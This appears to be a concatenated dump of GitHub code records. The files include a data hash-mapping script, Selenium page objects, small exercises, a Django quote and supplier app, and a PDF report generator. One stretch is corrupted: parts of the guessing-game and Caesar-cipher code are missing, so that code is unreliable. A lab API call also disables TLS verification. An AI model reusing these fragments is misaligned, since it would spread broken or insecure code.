CLUSTER_MAP_SHEET_DIR, file)\n\n hash_data = pd.read_csv(district_hash_map_path)\n ## convert the dataframe into dict\n hash_map_rule = MyDistrictHashMapDict(zip(hash_data.district_hash, hash_data.district_map))\n \n #print(type(hash_map_rule))\n\n saved_file = \"cluster_map.pickle\"\n map_save_file = os.path.join(DATA_DIR, CONCRETE_DIR, CLUSTER_MAP_SHEET_DIR, saved_file)\n ## save into same dir as file\n with open(map_save_file, \"wb\") as f:\n pickle.dump(hash_map_rule, f)\n\n #print(hash_map_rule)\n\n\ndef map_additional(x, map_rule):\n if type(x) == str:\n x = map_rule[x]\n return x\n\n# map the district features in the input data_frame into value\ndef district_hash_map(data_frame):\n district_map_f = \"cluster_map.pickle\"\n district_map_f_path = os.path.join(DATA_DIR, CONCRETE_DIR, CLUSTER_MAP_SHEET_DIR, \n district_map_f)\n if not os.path.exists(district_map_f_path):\n print(\"not existed, so we create one\")\n create_hash_district_map_dict()\n # load the needed map file\n \n map_rule = MyDistrictHashMapDict()\n with open(district_map_f_path, \"rb\") as f:\n map_rule = pickle.load(f)\n\n print(\"map_rule: \", type(map_rule))\n # map the needed cols..\n for i in range(len(data_frame.columns)):\n if \"district_hash\" in data_frame.columns[i]:\n # map the hash according to the map rule\n district_hash_col = data_frame.columns[i]\n 
data_frame[district_hash_col] = data_frame[district_hash_col].replace(map_rule)\n #print(type(data_frame[district_hash_col][23]))\n # ## solve the district hash that not mapped\n data_frame[district_hash_col] = data_frame[district_hash_col].apply(lambda x: map_additional(x, map_rule))\n # after mapping, delete its hash str\n new_name = re.sub(\"_hash\",\"\",district_hash_col)\n data_frame.rename(columns={district_hash_col: new_name}, inplace = True)\n\n with open(district_map_f_path, \"wb\") as f:\n pickle.dump(map_rule, f)\n return data_frame\n\n\n## input the dir you want to map the hash\ndef district_hash_map_dir(needed_map_dir):\n if not os.path.isdir(needed_map_dir) or not os.path.exists(needed_map_dir):\n raise IOError(\"ERROR: \" + needed_map_dir + \" not existed or its not a dir\")\n print(\"mapping all the district... in \" + needed_map_dir)\n for file in os.listdir(needed_map_dir):\n if \".csv\" in file:\n file_path = os.path.join(needed_map_dir, file)\n # map all the district into concrete value\n mapped_data_frame = district_hash_map(pd.read_csv(file_path))\n # change the file\n mapped_data_frame.to_csv(file_path, index = False, na_rep = \"NULL\")\n\n\n\n\n###################### id hash map #################################\n\n### we should distinguish the:\n# - order_id\n# - driver_id\n# - passenger_id\n## according to the input: map_rule_name(str only)\n\ndef id_hash_map(data_frame, map_rule_name):\n print(\"need to map: \" + map_rule_name)\n\n saved_file = map_rule_name + \".pickle\"\n id_map_f_path = os.path.join(DATA_DIR, CONCRETE_DIR, CLUSTER_MAP_SHEET_DIR, saved_file)\n id_map_rule = MyIDHashMapDict()\n # this data_frame is the one needed to be mapped\n if map_rule_name in data_frame.columns:\n # load the needed map file\n if os.path.exists(id_map_f_path):\n with open(id_map_f_path, \"rb\") as f:\n id_map_rule = pickle.load(f)\n\n\n # map the needed cols..\n for i in range(len(data_frame.columns)):\n if map_rule_name == data_frame.columns[i]:\n print(\"mapping id: \", map_rule_name)\n # map the hash according to the map rule\n id_hash_col = data_frame.columns[i]\n \n if id_map_rule:\n # map the id --> value contained in the map rule\n data_frame[id_hash_col] = data_frame[id_hash_col].replace(id_map_rule)\n # map the additional\n data_frame[id_hash_col] = data_frame[id_hash_col].apply(lambda x: map_additional(x, id_map_rule))\n else:\n data_frame[id_hash_col] = data_frame[id_hash_col].apply(lambda x: map_additional(x, id_map_rule))\n # after mapping, delete its hash str\n new_name = re.sub(\"_id\",\"\",id_hash_col)\n data_frame.rename(columns={id_hash_col: new_name}, inplace = True)\n with open(id_map_f_path, \"wb\") as f:\n pickle.dump(id_map_rule, f)\n return data_frame\n\n\ndef id_hash_map_dir(needed_map_dir, map_rule_name):\n if not os.path.isdir(needed_map_dir) or not os.path.exists(needed_map_dir):\n raise IOError(\"ERROR: \" + needed_map_dir + \" not existed or its not a dir\")\n print(\"mapping all the id... 
in \" + needed_map_dir)\n for file in os.listdir(needed_map_dir):\n if \".csv\" in file:\n file_path = os.path.join(needed_map_dir, file)\n # map all the district into concrete value\n mapped_data_frame = id_hash_map(pd.read_csv(file_path), map_rule_name)\n # change the file\n mapped_data_frame.to_csv(file_path, index = False, na_rep = \"NULL\")\n\n\nif __name__ == '__main__':\n ################# traffic data district hash map ###############\n # data_frame = pd.read_csv(os.path.join(DATA_DIR, CONCRETE_DIR, TRAFFIC_SHEET_DIR, \n # \"traffic_data_2016-01-01.csv\"))\n # data_frame = district_hash_map(data_frame)\n # print(data_frame)\n # district_hash_map_dir()\n\n\n\n ################ order data district hash map ###################\n data_frame = pd.read_csv(os.path.join(DATA_DIR, CONCRETE_DIR, ORDER_SHEET_DIR, \n \"order_data_2016-01-01.csv\"))\n# data_frame = district_hash_map(data_frame)\n data_frame = id_hash_map(data_frame, \"passenger_id\")\n print(data_frame)\n # data_frame = pd.read_csv(os.path.join(DATA_DIR, CONCRETE_DIR, ORDER_SHEET_DIR, \n # \"order_data_2016-01-01.csv\"))\n # df = district_hash_map(data_frame)\n # print(df) \n # df.to_csv(\"asdfdsffsdasdaf.csv\", index = False, na_rep = \"NULL\")\n","repo_name":"Heipiao/coding","sub_path":"operate_hash.py","file_name":"operate_hash.py","file_ext":"py","file_size_in_byte":7579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"39573342869","text":"from selenium.webdriver.common.by import By\nfrom pages.base_page import BasePage\n\n\nclass TexBoxPage(BasePage):\n\n def fill_all_fields(self, form_data: dict):\n self.find_element(self.Locators.FULL_NAME).send_keys(form_data.get(\"user_name\"))\n self.find_element(self.Locators.USER_EMAIL).send_keys(form_data.get(\"user_email\"))\n self.find_element(self.Locators.CURRENT_ADDR).send_keys(form_data.get(\"current_addr\"))\n self.find_element(self.Locators.PERMANENT_ADDR).send_keys(form_data.get(\"permanent_addr\"))\n\n def click_on_submit(self):\n self.find_and_scroll(self.Locators.SUBMIT_BUTTON).click()\n\n def get_created_fields(self):\n paragraphs = self.find_elements(self.Locators.CREATED_FIELDS)\n user_name = paragraphs[0].text.split(':')[-1]\n user_email = paragraphs[1].text.split(':')[-1]\n current_addr = paragraphs[2].text.split(':')[-1]\n permanent_addr = paragraphs[3].text.split(':')[-1]\n\n return dict(\n user_name=user_name,\n user_email=user_email,\n current_addr=current_addr,\n permanent_addr=permanent_addr\n )\n\n\n\n class Locators:\n FULL_NAME = (By.ID, \"userName\")\n USER_EMAIL = (By.ID, \"userEmail\")\n CURRENT_ADDR = (By.ID, \"currentAddress\")\n PERMANENT_ADDR = (By.ID, \"permanentAddress\")\n SUBMIT_BUTTON = (By.CSS_SELECTOR, \"button#submit\")\n CREATED_FIELDS = (By.CSS_SELECTOR, \"div#output p\")\n\n\nclass ButtonsPage(BasePage):\n\n def click_on_button(self):\n self.find_element(self.Locators.LCLICK_BUTTON).click()\n\n def get_msg_shown(self):\n return self.find_element(self.Locators.LCLICK_MSG).text\n\n class Locators:\n LCLICK_BUTTON = (By.XPATH, \"//button[text()='Click Me']\")\n LCLICK_MSG = (By.CSS_SELECTOR, \"p#dynamicClickMessage\")\n","repo_name":"dmytroPPK/qaauto-course","sub_path":"lesson19/pages/elements_page.py","file_name":"elements_page.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"32287294957","text":"def countCharacters(words, chars):\n good_arr = []\n for word in words:\n str 
= chars\n good = True\n print(\"word is\",word)\n print (\"str is\", str)\n for letter in word:\n print(\"letter is\", letter)\n if letter in str:\n index = str.find(letter)\n str = str[:index] + str[(index +1):]\n print(\"str is\", str)\n else:\n good = False\n break\n\n if good:\n good_arr.append(len(word))\n\n return sum(good_arr)\n","repo_name":"Mariamjaludi/algorithms-practice","sub_path":"python/count_character.py","file_name":"count_character.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"33776718519","text":"import configparser\nfrom fsactionedit.amigaactions import AmigaActions\n\n\nclass ConfigHandler:\n\n def __init__(self):\n self.amigaactions = AmigaActions()\n self._loaded_config = None\n self._loaded_configfile = None\n self._our_config = None\n self._non_action_count = 0\n\n @property\n def loaded_config(self):\n return self._loaded_config\n\n @loaded_config.setter\n def loaded_config(self, value):\n if not isinstance(value, configparser.ConfigParser) and value is not None:\n raise TypeError('Cannot assign this shit as a loaded config.')\n else:\n self._loaded_config = value\n if value is None:\n self._loaded_configfile = None\n\n @property\n def loaded_configfile(self):\n return self._loaded_configfile\n\n @property\n def non_action_count(self):\n return self._non_action_count\n\n def load(self, configfile):\n \"\"\"Load config from file,\n return actions (key = val) or None on error.\"\"\"\n self._non_action_count = 0\n self._loaded_config = configparser.ConfigParser(\n delimiters=('=',), strict=False)\n try:\n cfglist = self._loaded_config.read(configfile)\n except configparser.Error:\n return None\n if len(cfglist) == 0 or self._loaded_config.has_section('fs-uae') is False:\n return None\n self._loaded_configfile = configfile\n action_opts = []\n for opt, val in self._loaded_config.items('fs-uae'):\n print(opt, val)\n if self.amigaactions.is_valid(val):\n action_opts.append('{0} = {1}'.format(opt, val))\n else:\n self._non_action_count += 1\n print(action_opts)\n return action_opts\n\n def save(self, path, cfglist, include_loaded=True):\n \"\"\"Save a key=val list of options to path, if include_loaded=True\n ALL prev. 
loaded options will also be saved.\n        Return path on success, False on error.\"\"\"\n        if include_loaded is True and self._loaded_config is not None:\n            self._our_config = self._loaded_config\n        else:\n            self._our_config = configparser.ConfigParser(delimiters=('=',), strict=False)\n        if not self._our_config.has_section('fs-uae'):\n            self._our_config['fs-uae'] = {}\n        self._our_fsconfig = self._our_config['fs-uae']\n        for cfg in cfglist:\n            key, val = cfg.split('=', 1)\n            self._our_fsconfig[key.strip()] = val.strip()\n        if not path.endswith('.fs-uae'):\n            path += '.fs-uae'\n        try:\n            with open(path, 'wt') as f:\n                self._our_config.write(f)\n        except OSError:\n            return False\n        else:\n            self._loaded_config = self._our_config\n            self._loaded_configfile = path\n            return path\n\n    def remove_action(self, action):\n        \"\"\"Remove an action from the loaded configuration.\"\"\"\n        if self.loaded_config is None:\n            return\n        self.loaded_config.remove_option('fs-uae', action)\n\nif __name__ == '__main__':\n    import os\n    os.chdir('/tmp')\n    c = ConfigHandler()\n    a = c.load(os.path.expanduser('~/FS-UAE/Configurations/Host.fs-uae'))\n    print(a)\n","repo_name":"sonnenscheinchen/fsactioneditor","sub_path":"fsactionedit/confighandler.py","file_name":"confighandler.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"73134218538","text":"import random\r\n\r\nprint(\"Welcome to Rock Paper Scissor!\\n\")\r\nend = False\r\nwhile not end:\r\n    print(\"What do you choose?\\n\")\r\n    enemyChoice = random.randint(0,2)\r\n    player_Choice = int(input(\"0 for ROCK, 1 for PAPER, 2 for SCISSOR\\n\"))\r\n    while (player_Choice != 0) and (player_Choice != 1) and (player_Choice != 2):\r\n        player_Choice = int(input(\"0 for ROCK, 1 for PAPER, 2 for SCISSOR\\n\"))  # re-parse as int so the check above can terminate\r\n    # 0 = 0, 0 < 1, 0 > 2\r\n    # 1 > 1, 1 = 1, 1 < 2\r\n    # 2 < 0, 2 > 1, 2 = 2\r\n    if player_Choice == 0:\r\n        if enemyChoice == 0:\r\n            print(\"You picked ROCK and the bot picked ROCK, it's a tie!\\n\")\r\n        elif enemyChoice == 1:\r\n            print(\"You picked ROCK and the bot picked PAPER, you lose!\\n\")\r\n        elif enemyChoice == 2:\r\n            print(\"You picked ROCK and the bot picked SCISSOR, you win!\\n\")\r\n    elif player_Choice == 1:\r\n        if enemyChoice == 0:\r\n            print(\"You picked PAPER and the bot picked ROCK, you win!\\n\")\r\n        elif enemyChoice == 1:\r\n            print(\"You picked PAPER and the bot picked PAPER, it's a tie!\\n\")\r\n        elif enemyChoice == 2:\r\n            print(\"You picked PAPER and the bot picked SCISSOR, you lose!\\n\")\r\n    else:\r\n        if enemyChoice == 0:\r\n            print(\"You picked SCISSOR and the bot picked ROCK, you lose!\\n\")\r\n        elif enemyChoice == 1:\r\n            print(\"You picked SCISSOR and the bot picked PAPER, you win!\\n\")\r\n        elif enemyChoice == 2:\r\n            print(\"You picked SCISSOR and the bot picked SCISSOR, it's a tie!\\n\")\r\n    print(\"Do you want to play again?\")\r\n    keepPlaying = input(\"Y for YES, N for NO\\n\").upper()\r\n    if keepPlaying == \"N\":\r\n        end = True\r\nprint(\"Thanks for playing!\")","repo_name":"myang5128/python_projects","sub_path":"Rock Paper Scissors.py","file_name":"Rock Paper Scissors.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18540138879","text":"n=int(input())\n\nprime = []\n\nfor i in range(11,55556,2):\n    flag = True\n    for j in range(2,int(i**0.5)+1):\n        if i%j==0:\n            flag=False\n            break\n    if flag:\n        prime.append(i)\n    \nprime_mod1 = []\n\nfor i in prime:\n    if i%5==1:\n
prime_mod1.append(i)\nprint(*prime_mod1[:n])","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03362/s745166873.py","file_name":"s745166873.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"28156697732","text":"import random\r\n\r\nguessTaken=0\r\n\r\nprint('Hello! Whats your name?')\r\nname=input()\r\n\r\nnumber = random.randint(1,50)\r\nprint('Well '+name+' I am thinking of a number between 1 and 50.')\r\n\r\nfor guessTaken in range(6):\r\n print(\"Take a guess.\")\r\n guess = input()\r\n guess = int(guess)\r\n\r\n if(guessnumber*2):\r\n print(\"Oh! You went too far\")\r\n elif(guess90) and (ord(i)<97 or ord(i)>122):\r\n output+=i\r\n continue\r\n if (ord(i)+1)>=97 and (ord(i)+1)<=122 or (ord(i)+1>=65 and ord(i)+1<=90):\r\n output+=chr(ord(i)+1)\r\n if (ord(i)+1)>122:\r\n output+=chr(ord(i)-122+97)\r\n if (ord(i)+1)>90 and ord(i)<97:\r\n output+=chr(ord(i)-90+65)\r\n return \"\".join(output)\r\n \r\n#CeasarCipherDec - decrypts the string\r\ndef CeasarCipherDec(word):\r\n output=[]\r\n for i in word:\r\n n=ord(i)\r\n if (ord(i)<65 or ord(i)>90) and (ord(i)<97 or ord(i)>122):\r\n output+=i\r\n continue\r\n if (ord(i)-1)>=65 and (ord(i)-1)<=90 or (ord(i)-1>=97 and ord(i)-1<=122):\r\n output+=chr(ord(i)-1)\r\n if (ord(i)-1)<97 and (ord(i)-1)>90:\r\n output+=chr(ord(i)+90-65)\r\n if (ord(i)-1)<65:\r\n output+=chr(ord(i)+122-97)\r\n return \"\".join(output)\r\n\r\nif __name__ == '__main__':\r\n txt=input(\"Enter your text: \")\r\n a=CeasarCipher(txt)\r\n print(a)\r\n print(CeasarCipherDec(a))","repo_name":"darkblaro/Python-code-samples","sub_path":"ceasarCipher.py","file_name":"ceasarCipher.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"11083068747","text":"from config import *\nfrom utilities import *\nfrom Labs import getIdLab\nimport json\n\ndef createLinks():\n id_labs = getIdLab('create link in')\n print(\"id lab: {}\".format(id_labs))\n endpoint = \"/labs/{}/links\".format(id_labs)\n URL = url(endpoint)\n src_int = input(\"src_int: \")\n dst_int = input(\"dst_int: \")\n\n data = json.dumps({\n 'src_int': src_int,\n 'dst_int': dst_int\n })\n\n print(\"Creating links in lab with id {}...\".format(id_labs))\n resp = req.post(URL, headers=headers, data=data, verify=False)\n print(resp.text)","repo_name":"Theman49/mini-project-msib","sub_path":"Links.py","file_name":"Links.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"23645387573","text":"def solution(participant, completion):\n p = check(participant)\n c = check(completion)\n for name in c:\n if p.get(name):\n if c.get(name) == p.get(name):\n p.pop(name)\n for name in p:\n answer = name\n return answer\n\ndef check(checkList):\n result = {}\n for each in checkList:\n if result.get(each):\n result[each] = result.get(each) + 1\n else:\n result[each] = 1\n return result\n","repo_name":"chomh168/beakjoon","sub_path":"programmers/해시/p_해시_1/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9739055975","text":"import time\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import redirect\nfrom 
django.db.models import Q\nfrom django.utils.translation import gettext_lazy as _\nfrom core.models import *\nfrom core.forms import *\n\ndef dashboard(request):\n return render(request, 'dashboard.html')\n\ndef category_list(request):\n return render(request, 'category/list.html', {\n \"categories\": Category.objects.all(),\n })\n\ndef category_add(request):\n if request.method == 'POST':\n form = CategoryAddForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request, _(\"Success\"))\n return redirect('category_list')\n \n return render(request, 'category/add.html', {\n 'form': CategoryAddForm,\n })\n\ndef category_edit(request, pk):\n category = Category.objects.get(id=pk)\n\n if request.method == 'POST':\n form = CategoryAddForm(request.POST, request.FILES, instance=category)\n if form.is_valid():\n form.save()\n messages.success(request, _(\"Success\"))\n return redirect('category_list')\n else:\n messages.error(request, form.errors)\n return redirect('./')\n \n\n return render(request, 'category/edit.html', {\n 'form': CategoryAddForm(request.POST or None, instance=category)\n })\n\ndef category_delete(request, pk):\n Category.objects.get(id=pk).delete()\n time.sleep(1)\n return redirect('category_list')\n\ndef product_list(request):\n return render(request, 'product/list.html', {\n \"products\": Product.objects.all(),\n })\n\ndef product_add(request):\n if request.method == 'POST':\n form = ProductAddForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request, _(\"Success\"))\n return redirect('product_list')\n else:\n messages.error(request, form.errors)\n return redirect('product_add')\n \n return render(request, 'product/add.html', {\n 'form': ProductAddForm,\n })\n\ndef product_edit(request, pk):\n product = Product.objects.get(id=pk)\n\n if request.method == 'POST':\n form = ProductAddForm(request.POST, request.FILES, instance=product)\n if form.is_valid():\n form.save()\n messages.success(request, _(\"Success\"))\n return redirect('product_list')\n else:\n messages.error(request, form.errors)\n return redirect('./')\n \n\n return render(request, 'product/edit.html', {\n 'form': ProductAddForm(request.POST or None, instance=product)\n })\n\ndef product_delete(request, pk):\n Product.objects.get(id=pk).delete()\n time.sleep(1)\n return redirect('product_list')\n\ndef supplier_list(request):\n return render(request, 'supplier/list.html', {\n \"suppliers\": Supplier.objects.all(),\n })\n\ndef supplier_add(request):\n if request.method == 'POST':\n form = SupplierAddForm(request.POST, request.FILES)\n account = request.POST['id_supplier']\n if form.is_valid():\n supplier = form.save()\n user = get_user_model().objects.create(username=account)\n user.set_password(account)\n user.save()\n supplier.account = user\n supplier.save()\n messages.success(request, _(\"Success\"))\n return redirect('supplier_list')\n else:\n messages.error(request, form.errors)\n return redirect('supplier_add')\n \n return render(request, 'supplier/add.html', {\n 'form': SupplierAddForm,\n })\n\ndef supplier_edit(request, pk):\n supplier = Supplier.objects.get(id=pk)\n user = get_user_model().objects.get(id=supplier.account.id)\n if request.method == 'POST':\n form = SupplierAddForm(request.POST, request.FILES, instance=supplier)\n print(request.POST)\n if form.is_valid():\n supplier = form.save()\n supplier.account = user\n supplier.save()\n messages.success(request, _(\"Success\"))\n return redirect('supplier_list')\n else:\n 
messages.error(request, form.errors)\n return redirect('./')\n \n\n return render(request, 'supplier/edit.html', {\n 'form': SupplierAddForm(request.POST or None, instance=supplier)\n })\n\ndef supplier_delete(request, pk):\n get_user_model().objects.get(id=Supplier.objects.get(id=pk).account.id).delete()\n time.sleep(1)\n return redirect('supplier_list')\n\ndef reg_prd_view(request):\n user = get_user_model().objects.get(id=request.user.id)\n\n if request.method == 'POST':\n product_ids = [int(x) for x in request.POST['product_ids']]\n supplier = Supplier.objects.get(account=user)\n products = [Product.objects.get(id=product_id) for product_id in product_ids]\n for product in supplier.products.all():\n products.append(product)\n supplier.products.set(products)\n\n return render(request, 'supplier/reg_prd.html', {\n \"products\": Product.objects.all(),\n })\n\ndef un_reg_prd(request, pk):\n user = get_user_model().objects.get(id=request.user.id)\n\n if request.method == 'POST':\n supplier = Supplier.objects.get(account=user)\n products = supplier.products.all().filter(~Q(id=pk))\n supplier.products.set(products)\n\n return redirect('reg_prd_view')\n\n\ndef reg_prd(request, pk):\n print('ok')\n user = get_user_model().objects.get(id=request.user.id)\n\n if request.method == 'POST':\n supplier = Supplier.objects.get(account=user)\n products = [x for x in supplier.products.all()]\n products.append(Product.objects.get(id=pk))\n supplier.products.set(products)\n\n # time.sleep(1)\n return redirect('reg_prd_view')\n\ndef quote_list(request):\n quotes = POrder.objects.all()\n quotes_filter = []\n for quote in quotes:\n if quote.porderdetail_set.all().count() > 0:\n quotes_filter.append(quote)\n return render(request, 'quote/list.html', {\n \"quotes\": quotes_filter,\n })\n\ndef quote_add(request):\n if request.method == 'POST':\n supplier_id = request.POST.get('create_with_supplier')\n if not supplier_id:\n return redirect('quote_add')\n supplier = Supplier.objects.get(id=supplier_id)\n porder = POrder.objects.create(\n supplier = supplier,\n )\n return redirect('quote_edit', pk=porder.id)\n \n return render(request, 'quote/add.html', {\n 'form': QuoteAddForm,\n \"products\": Product.objects.all(),\n })\n\ndef quote_edit(request, pk):\n supplier = Supplier.objects.get(account = request.user)\n quote = POrder.objects.get(id=pk)\n product_quote_detail = [x.product for x in quote.porderdetail_set.all()]\n if request.method == 'POST':\n supplier_id = request.POST.get('edit_with_supplier')\n if not supplier_id:\n messages.warning(request, 'Must have a supplier')\n return redirect('quote_edit', quote.id)\n supplier_more = Supplier.objects.get(id=supplier_id)\n quote.supplier = supplier_more\n quote.save()\n return redirect('quote_edit', pk=quote.id)\n \n return render(request, 'quote/edit.html', {\n 'quote': quote,\n 'product_quote_detail': product_quote_detail,\n 'form': QuoteAddForm(request.POST or None, instance=quote),\n 'products': quote.supplier.products.all(),\n 'quote_details': quote.porderdetail_set.all(),\n })\n\ndef quote_detail_edit_save(request, pk):\n quote_detail = POrderDetail.objects.get(id=pk)\n quote = quote_detail.porder\n quote_detail.quantity = request.POST.get('quantity') or 1\n quote_detail.save()\n return redirect('quote_edit', pk=quote.id)\n\n\ndef quote_add_detail(request, quote_id, product_id):\n quantity = request.POST.get('quantity')\n quote = POrder.objects.get(id=quote_id)\n product = Product.objects.get(id=product_id)\n POrderDetail.objects.create(\n porder=quote,\n 
product=product,\n )\n return redirect('quote_edit', pk=quote.id)\n\ndef quote_remove_detail(request, quote_id, product_id):\n quote = POrder.objects.get(id=quote_id)\n product = Product.objects.get(id=product_id)\n POrderDetail.objects.get(porder=quote, product=product).delete()\n return redirect('quote_edit', pk=quote.id)\n \n\ndef quote_add_before(request, pk):\n product = Product.objects.get(id=pk)\n supplier_id = request.POST.get('supplier_more')\n if not supplier_id:\n messages.error(request, \"Must choose supplier\")\n return redirect('quote_add')\n supplier = Supplier.objects.get(id=supplier_id)\n porder = POrder.objects.create(\n supplier = supplier,\n )\n print(porder)\n porder_detail = POrderDetail.objects.create(\n product = product,\n porder = POrder.objects.get(id=porder.id),\n quantity = 1,\n )\n\n # time.sleep(1)\n return redirect('quote_edit', pk=porder.id)\n\ndef quote_s_list(request):\n supplier = Supplier.objects.get(account = request.user)\n return render(request, 'quote/s_list.html', {\n 'quotes': POrder.objects.filter(~Q(status='draft'), supplier=supplier).order_by('-id'),\n })\n\ndef quote_s_quote(request, pk):\n quote = POrder.objects.get(id=pk)\n return render(request, 'quote/s_quote.html', {\n 'quote': quote,\n 'quote_details': quote.porderdetail_set.all(), \n })\n\ndef quote_s_quote_update(request, pk):\n quote_detail = POrderDetail.objects.get(id=pk)\n quote_detail.price = request.POST.get('price')\n if quote_detail.price == None or quote_detail.price == \"\":\n messages.warning(request, _(\"Enter price befor update it\"))\n return redirect('quote_s_quote', quote_detail.porder.id)\n quote_detail.save()\n return redirect('quote_s_quote', quote_detail.porder.id)\n\ndef quote_delete(request, pk):\n POrder.objects.get(id=pk).delete()\n time.sleep(1)\n return redirect('quote_list')\n\n\ndef quote_request(request, pk):\n quote = POrder.objects.get(id=pk)\n quote.status = 'new'\n quote.save()\n messages.success(request, _('Send request successfully'))\n return redirect('quote_list')\n\ndef quote_reject(request, pk):\n quote = POrder.objects.get(id=pk)\n if request.POST.get('note') is not None:\n quote.note = request.POST.get('note')\n quote.status = 'reject'\n quote.save()\n messages.warning(request, _('Reject request sent'))\n return redirect('quote_s_list')","repo_name":"huoquandace/IM2","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"14433522853","text":"from reportlab.pdfgen import canvas \nfrom reportlab.platypus import Paragraph, Frame\n# from reportlab import platypus\n# from reportlab.lib.styles import ParagraphStyle as PS\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase import pdfmetrics\n# from reportlab.lib import colors\nfrom math import sqrt\nfrom math import ceil\n\n\n\ndef GetReport(text,NumPages,NumChannel,NumVideo,region,start_time):\n\n # ------------------------------------------------------------------------\n BarChannelAge=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarChannelAge\")+\".png\"\n BarChannelViews=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarChannelViews\")+\".png\"\n BarChannelSubscribers=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarChannelSubscribers\")+\".png\"\n BarChannelVideos=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarChannelVideos\")+\".png\"\n 
BarVideoAges=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarVideoAges\")+\".png\"\n BarVideoDuration=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarVideoDuration\")+\".png\"\n BarVideoViews=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarVideoViews\")+\".png\"\n ScatViewsLikes=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_ScatViewsLikes\")+\".png\"\n ScatLikesDislikes=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_ScatLikesDislikes\")+\".png\"\n ScatViewsComments=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_ScatViewsComments\")+\".png\"\n HorizontalBarOverview=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_HorizontalBarOverview\")+\".png\"\n HorizontalBarAll4=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_HorizontalBarAll4\")+\".png\"\n TableChannel=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_TableChannel\")+\".png\"\n TableVideos=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_TableVideos\")+\".png\"\n TableThumbnail=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_TableThumbnails\")+\".png\"\n\n\n\n # ------------------------------------------------------------------------\n\n\n fileName = 'Analystics-RoYR-'+str(text)+'.pdf'\n documentTitle = 'Analystics-RoYR-'+str(text)\n title = 'Relevance of Youtube Relevance'\n subtitle=\"Analysis of a random youtube search from a non personalized account.\"\n pdfmetrics.registerFont(TTFont('OurFont', 'Nirmala.ttf'))\n pdf = canvas.Canvas(fileName)\n\n # print(pdf.getAvailableFonts())\n pdf.setTitle(documentTitle)\n # drawMyRuler(pdf)\n def drawMyRuler(pdf):\n pdf.setFont('Helvetica', 4)\n pdf.drawString(0,830, str((0,830)))\n x=50\n while(x<=550):\n pdf.drawString(x,830, str((x,830)))\n x+=50\n pdf.drawString(575,830, str((575,830)))\n pdf.drawString(0,10, str((0,10)))\n y=50\n while(y<=800):\n pdf.drawString(0,y, str((0,y)))\n y=y+50 \n\n def TitleText():\n pdf.setFillColorRGB(255, 0, 0)\n pdf.setFont('Helvetica-Bold',8)\n\n def ResultText():\n pdf.setFillColorRGB(0, 0, 0)\n pdf.setFont('Helvetica',8)\n\n def HeaderText1():\n pdf.setFillColorRGB(0, 0, 0)\n pdf.setFont('Helvetica-Bold',12)\n\n def HeaderText2():\n pdf.setFillColorRGB(0, 0, 0)\n pdf.setFont('Helvetica-Bold',10)\n # ------------------------------------------------------------------------\n pdf.setFont('Helvetica-Bold',24)\n pdf.drawCentredString(290, 790, title)\n HeaderText2()\n pdf.drawCentredString(290, 770, subtitle)\n subtitle=\"By Sarthak Arora\"\n pdf.drawCentredString(290, 755, subtitle)\n\n items = []\n link = 'Send Email'\n items.append(Paragraph(link))\n f = Frame(200, 730, 70, 25, showBoundary=0)\n f.addFromList(items, pdf)\n\n items = []\n link = 'Github'\n items.append(Paragraph(link))\n f = Frame(270, 730, 50, 25, showBoundary=0)\n f.addFromList(items, pdf)\n\n items = []\n link = 'LinkedIn'\n items.append(Paragraph(link))\n f = Frame(320, 730, 50, 25, showBoundary=0)\n f.addFromList(items, pdf)\n # ------------------------------------------------------------------------\n\n \n xoverview=50\n yoverview=700\n pdf.line(50, yoverview+20, 530, yoverview+20)\n TitleText()\n pdf.drawString(xoverview, yoverview, \"String Searched\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview, \": \"+str(text))\n TitleText()\n pdf.drawString(xoverview, yoverview-10, \"Pages Searched\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-10, \": \"+str(NumPages))\n TitleText()\n 